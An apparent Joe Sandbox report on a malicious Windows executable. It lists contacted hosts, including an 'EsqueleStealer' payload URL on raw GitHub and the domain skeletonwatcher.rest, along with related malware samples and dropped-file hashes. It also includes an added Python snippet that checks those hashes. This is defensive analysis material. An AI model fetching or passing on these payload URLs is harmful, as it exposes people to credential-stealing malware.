                                                                                                            https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                              high
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://github.com/vadimg/js_bintrees. | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://deno.land/manual/linking_to_external_code/import_maps | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| https://dom.spec.whatwg.org/#event-path | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://deno.land/std/examples/colors.ts | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| http://.css | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | false | | high |
| https://some/file.ts | dGhlYXB0Z3JvdXA=-free.exe | false | Avira URL Cloud: safe | unknown |
| https://github.com/clap-rs/clap/issues | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | false | | high |
| https://dl.deno.land/canary-latest.txt | dGhlYXB0Z3JvdXA=-free.exe | false | Avira URL Cloud: safe | unknown |
| https://deno.land/std/ | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| https://w3c.github.io/user-timing) | dGhlYXB0Z3JvdXA=-free.exe | false | Avira URL Cloud: safe | unknown |
| https://golang.org/pkg/io/#pkg-constants | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://dl.deno.land/canary/P | dGhlYXB0Z3JvdXA=-free.exe | false | Avira URL Cloud: safe | unknown |
| https://crbug.com/v8/8520 | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmp | false | | high |
| https://fetch.spec.whatwg.org/#concept-construct-readablestream | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope) | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://deno.land/std/testing/asserts.ts | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| https://github.com/denoland/deno/tree/master/test_plugin | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| https://fetch.spec.whatwg.org/#dom-headers | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global) | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| https://github.com/denoland/deno/issues/4591) | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://deno.land/manual | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
| http://.jpg | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | false | | high |
| https://deno.land/std/examples/welcome.ts | dGhlYXB0Z3JvdXA=-free.exe | false | | high |
Country legend (share of contacted IPs):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 188.114.97.3 | skeletonwatcher.rest | European Union | | 13335 | CLOUDFLARENETUS | false |
| 185.199.110.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583221
Start date and time: 2025-01-02 08:58:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dGhlYXB0Z3JvdXA=-free.exe
Detection: MAL
Classification: mal72.expl.evad.winEXE@16/18@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 4
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target dGhlYXB0Z3JvdXA=-free.exe, PID 6004 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
| Time | Type | Description |
|---|---|---|
| 02:59:23 | API Interceptor | 31x Sleep call for process: powershell.exe modified |
| 02:59:36 | API Interceptor | 1x Sleep call for process: WMIC.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/ |
| 188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/ |
| 188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45 |
| 188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq |
| 188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25 |
| 188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/ |
| 188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download |
| 188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico |
| 188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/ |
| 188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check |
| 185.199.110.133 | sys_upd.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | cr_asm_menu..ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | cr_asm_phshop..ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | cr_asm_atCAD.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | xK44OOt7vD.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | Lm9IJ4r9oO.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | cr_asm_crypter.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 185.199.110.133 | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| raw.githubusercontent.com | Gz1bBIg2Tw.exe | malicious | LummaC | 185.199.109.133 |
| raw.githubusercontent.com | ipmsg5.6.18_installer.exe | malicious | Unknown | 185.199.111.133 |
| raw.githubusercontent.com | over.ps1 | malicious | Vidar | 185.199.109.133 |
| raw.githubusercontent.com | Epsilon.exe | malicious | Unknown | 185.199.111.133 |
| raw.githubusercontent.com | eXbhgU9.exe | malicious | LummaC | 185.199.110.133 |
| raw.githubusercontent.com | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133 |
| raw.githubusercontent.com | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133 |
| raw.githubusercontent.com | Supplier.bat | malicious | Unknown | 185.199.110.133 |
| raw.githubusercontent.com | Supplier.bat | malicious | LodaRAT, XRed | 185.199.111.133 |
| raw.githubusercontent.com | NEW-DRAWING-SHEET.bat | malicious | Unknown | 185.199.111.133 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| CLOUDFLARENETUS | CRf9KBk4ra.exe | malicious | DCRat | 172.67.19.24 |
| CLOUDFLARENETUS | http://www.rr8844.com | malicious | Unknown | 188.114.96.3 |
| CLOUDFLARENETUS | https://bitl.to/3Y0B | malicious | CAPTCHA Scam ClickFix | 104.17.208.240 |
| CLOUDFLARENETUS | ETVk1yP43q.exe | malicious | AZORult | 104.21.79.229 |
| CLOUDFLARENETUS | AimStar.exe | malicious | Blank Grabber | 162.159.128.233 |
| CLOUDFLARENETUS | 7FEGBYFBHFBJH32.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 188.114.96.3 |
| CLOUDFLARENETUS | 16oApcahEa.exe | malicious | Babuk, Djvu | 104.21.32.1 |
| CLOUDFLARENETUS | UhsjR3ZFTD.exe | malicious | LummaC | |
                                                                                                                                                  • 104.21.32.1
                                                                                                                                                  544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                  • 172.67.220.198
                                                                                                                                                  KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.157.254
                                                                                                                                                  FASTLYUShttps://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                  • 151.101.66.137
                                                                                                                                                  01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 151.101.66.137
                                                                                                                                                  Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.199.109.133
                                                                                                                                                  https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.193.44
                                                                                                                                                  http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.65.44
                                                                                                                                                  https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.129.44
                                                                                                                                                  ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 185.199.111.133
                                                                                                                                                  http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.129.140
                                                                                                                                                  FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.2.133
                                                                                                                                                  over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                  • 185.199.109.133
                                                                                                                                                  No context
                                                                                                                                                  No context
Process:C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):16
Entropy (8bit):3.75
Encrypted:false
SSDEEP:3:TVwTB9R:TVwNP
MD5:9A67F3B2DB49B9E3CBC3AB754E98F999
SHA1:7601692F0A66012FD59816BBA1FD212DBB2D3557
SHA-256:5CA1760126A2DDDB046A097A036CDEAFC5A4F38113832EEC2E645417F75B2820
SHA-512:5773417E935609520082D0D6D4F07435EC208D93D49C3455DFFEE7D99331F7E7848E3246B2B6E325696954312394BAA7FF09FE4801554E4A0AD87CE8CA61A638
Malicious:false
Reputation:low
Preview:dGhlYXB0Z3JvdXA=
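
The 16-byte file above, dropped by the sample itself, holds nothing but the sample's own base-64 file-name stem. The following Python is an added example and not part of the Joe Sandbox report: it recomputes the fingerprints the record lists (MD5, SHA1, SHA-256, SHA-512 and the 8-bit Shannon entropy) over that content, cross-checks them against the reported values, and decodes the base-64 strictly so that a non-base-64 blob is reported rather than silently mangled. The input byte string is constructed from the Preview field (the record says 16 bytes, no line terminators); the function names are the example's own.

```python
import base64
import binascii
import hashlib
import math
from collections import Counter
from typing import Dict, Optional

# Constructed from the record above: "ASCII text, with no line terminators",
# 16 bytes, Preview dGhlYXB0Z3JvdXA=. Under those facts this is the whole file.
DROPPED_FILE = b"dGhlYXB0Z3JvdXA="

# Digests copied from the record above, used only for cross-checking.
REPORTED: Dict[str, str] = {
    "MD5": "9A67F3B2DB49B9E3CBC3AB754E98F999",
    "SHA1": "7601692F0A66012FD59816BBA1FD212DBB2D3557",
    "SHA-256": "5CA1760126A2DDDB046A097A036CDEAFC5A4F38113832EEC2E645417F75B2820",
    "SHA-512": "5773417E935609520082D0D6D4F07435EC208D93D49C3455DFFEE7D99331F7E78"
               "48E3246B2B6E325696954312394BAA7FF09FE4801554E4A0AD87CE8CA61A638",
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte over the byte histogram (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def fingerprint(data: bytes) -> Dict[str, str]:
    """Hex digests in the report's upper-case notation."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def mismatches(data: bytes, reported: Dict[str, str]) -> Dict[str, str]:
    """Algorithms whose recomputed digest differs from the reported one (empty dict = all agree)."""
    fp = fingerprint(data)
    return {alg: fp[alg] for alg, want in reported.items() if fp[alg] != want.upper()}


def decode_if_base64(data: bytes) -> Optional[bytes]:
    """Strict base-64 decode (alphabet and padding enforced); None when data is not base-64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


if __name__ == "__main__":
    print("size", len(DROPPED_FILE), "entropy", round(shannon_entropy(DROPPED_FILE), 2))
    print("mismatches", mismatches(DROPPED_FILE, REPORTED) or "none")
    print("decoded", decode_if_base64(DROPPED_FILE))
```

The entropy of 3.75 follows directly from the histogram (two characters occur twice, twelve once), which is a useful sanity check that the Preview really is the entire file before trusting the digests; the strict decoder is what distinguishes a base-64 marker like this one from arbitrary short strings.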
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):1564
Entropy (8bit):5.645920333790338
Encrypted:false
SSDEEP:48:DSU4y4RQmFoUeCamfm9qr9tK8NLyAHu9OjlZS5GF7:GHyIFKL2O9qr2KLynOZZ4w7
MD5:A29D872777A7CDD12F5293B858D75671
SHA1:04B74019374D5D0CF0004FD0E0077EDED7AD5BF9
SHA-256:A333C74165F97F0715B8E08BCC97144937FEC09189CF0C36913591037EAEE617
SHA-512:D9BF5518C96ED31EE89FCF35BB5D9F2D4CCB7C81AC4531E546F502A4B3909ABC060150FEBC666C3F019FB586698D26786F85CC44B8F4A2C90B6A9B6A33EBE359
Malicious:false
Reputation:low
Preview:@...e...........\...................^................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Jan 2 09:36:01 2025, 1st section name ".debug$S"
Category:dropped
Size (bytes):1332
Entropy (8bit):3.9952282881819
Encrypted:false
SSDEEP:24:HvCFzW916yIPxHPwKqxmNII+ycuZhNnoakSE9PNnqS2d:2yKx4Kqxmu1uloa3UqSG
MD5:4D33362B5853BC00DB2FB1B764DC7A28
SHA1:3D1731CB6B20B0C46C2B1B0373D325197E7347B7
SHA-256:BADE44C9E5CFEF9F6E7FEC44400B11C47D4893CBADE67832067C48E5219682C9
SHA-512:21811DFE1F4E2B8584D580431998FD3108B40FEFEDC32D5455CAE722E16792B2A4CFD51954F22E252268C6DFBFC8576287A66EFCC7C3F09591444668C659DEB4
Malicious:false
Preview:L....^vg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP...............U.2......F.,z..D..........5.......C:\Users\user\AppData\Local\Temp\RESD9CB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.t.4.a.z.n.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Jan 2 09:36:05 2025, 1st section name ".debug$S"
Category:dropped
Size (bytes):1336
Entropy (8bit):4.004830406527154
Encrypted:false
SSDEEP:24:HLzgm9pwPH2wKqxmNII+ycuZhNgakSMPNnqSSd:PwP1Kqxmu1ulga3cqSC
MD5:26AAF69AAE381A06463B1C610B76954D
SHA1:B64E6314099355B558CECA41A2A29C93BDB0E909
SHA-256:A486C5290026C4359B6B78EBB171726BA6A10D2C7E11DC595DA8C5823B7F0311
SHA-512:E36E9FD78C7C67B3436968DB8410AB8AF8C2BE4F716656497762777228E6B86A633D3956E758ABE4CE216016F6E13882EAD665E91B09D9EF67F5525668E426B5
Malicious:false
Preview:L....^vg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP..................qx.}..X..:."..............5.......C:\Users\user\AppData\Local\Temp\RESE63E.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.b.3.v.2.t.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.0978688578700635
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynl1Gak7Ynqqsl1XPN5Dlq5J:+RI+ycuZhNnoakSE9PNnqX
MD5:558332FCB2A7F79ED946C52C7A13F044
SHA1:C999C2E8903B71D18FDE410CEEAA948EF056EE8A
SHA-256:C6EB01925DC95A9D7E02FF3EB3D03B259AB781A15A5A57A390B5B5ACCA08EF6E
SHA-512:CE197E3D130E6CFC1EAB58A2DE42D6123C701F181304ADA929B8BFA749A349095D2BE767C6AF1FAC524006477D71F2BE5BFA43C64EF337630C48670B6C080D4F
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.t.4.a.z.n.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.t.4.a.z.n.w.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):353
                                                                                                                                                  Entropy (8bit):4.82408068685792
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:gCsHS6yqVPuM/sq2SRaqK4LovyFwM/sezhkKwGButFi2SRkoSoOD9:gC4JTDfei7krW0FU9O9
                                                                                                                                                  MD5:379570600F5439DDA873EDA8F0CE4A79
                                                                                                                                                  SHA1:2023B772101AFF5B12AB53F24A69742A4B9C394F
